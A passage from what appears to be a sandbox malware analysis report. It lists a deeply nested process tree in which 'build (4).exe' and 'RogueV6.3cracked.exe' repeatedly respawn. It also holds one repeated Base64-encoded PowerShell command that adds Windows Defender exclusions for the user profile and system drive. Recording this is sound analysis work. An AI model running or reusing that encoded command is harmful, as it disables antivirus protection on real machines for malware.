        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        245⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        245⤵
        
        PID:8568
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        245⤵
        
        PID:8584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        246⤵
        
        PID:8680
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        246⤵
        
        PID:8828
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        246⤵
        
        PID:8744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        247⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        247⤵
        
        PID:9012
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        247⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        248⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        248⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        248⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        249⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        249⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        249⤵
        
        PID:8900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        250⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        250⤵
        
        PID:7280
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        250⤵
        
        PID:8972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        251⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        251⤵
        
        PID:8272
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        251⤵
        
        PID:8296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        252⤵
        
        PID:8452
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        252⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        252⤵
        
        PID:8888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        253⤵
        
        PID:8312
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        253⤵
        
        PID:8928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        253⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        254⤵
        
        PID:9188
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        254⤵
        
        PID:8344
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        254⤵
        
        PID:8476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        255⤵
        
        PID:8816
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        255⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        255⤵
        
        PID:7416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        256⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        256⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        256⤵
        
        PID:9068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        257⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        257⤵
        
        PID:9148
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        257⤵
        
        PID:8396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        258⤵
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        258⤵
        
        PID:8532
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        258⤵
        
        PID:8668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        259⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        259⤵
        
        PID:8392
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        259⤵
        
        PID:9212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        260⤵
        
        PID:8944
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        260⤵
        
        PID:8440
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        260⤵
        
        PID:8300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        261⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        261⤵
        
        PID:8696
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        261⤵
        
        PID:8476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        262⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        262⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        262⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        263⤵
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        263⤵
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        263⤵
        
        PID:7804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        264⤵
        
        PID:9144
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        264⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        264⤵
        
        PID:8720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        265⤵
        
        PID:8452
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        265⤵
        
        PID:8744
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        265⤵
        
        PID:8216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        266⤵
        
        PID:9116
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        266⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        266⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        267⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        267⤵
        
        PID:8396
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        267⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        268⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        268⤵
        
        PID:8596
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        268⤵
        
        PID:8948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        269⤵
        
        PID:7648
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        269⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        269⤵
        
        PID:9232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        270⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        270⤵
        
        PID:9340
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        270⤵
        
        PID:9368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        271⤵
        
        PID:9472
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        271⤵
        
        PID:9504
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        271⤵
        
        PID:9520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
